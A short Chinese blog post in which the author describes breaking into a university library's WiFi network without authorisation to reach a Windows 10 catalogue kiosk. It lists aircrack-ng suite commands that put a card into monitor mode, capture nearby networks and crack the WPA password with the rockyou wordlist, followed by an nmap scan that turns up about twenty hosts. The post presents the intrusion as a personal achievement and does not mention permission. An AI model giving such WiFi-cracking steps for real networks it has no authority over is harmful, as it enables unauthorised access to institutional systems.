第一篇博客,纪念我的开端
前言:
因校内图书馆有自习室,所以经常逃掉不喜欢的课去自学东西,每次进出图书馆都会看到在入口处摆着一台很大的可触摸图书查询机器,利用触摸键盘可发现是一台基于Win10的系统,不过什么端口都没开放,应该是被调过策略,动了想试试手的心态
渗透实记:
在点击虚拟键盘时,可以查看到wifi名字,逗留时间太长可能会引起图书管理员注意,便没有直接利用Windows查看密码
- 首先连接监听网卡,并使用airmon-ng查看wlan0
- airmon-ng start wlan0
- airodump-ng wlan0mon进行周围wifi探测
- <!--因为是校内WIFI,感觉不会太复杂,所以直接利用了Kali自带字典-->
- aircrack-ng -a2 -b BSSID -w /usr/share/wordlists/rockyou.txt 一把梭拿到密码
连接后用nmap扫ip,结果发现比我预期的多得多,至少有20个机器,而且高端口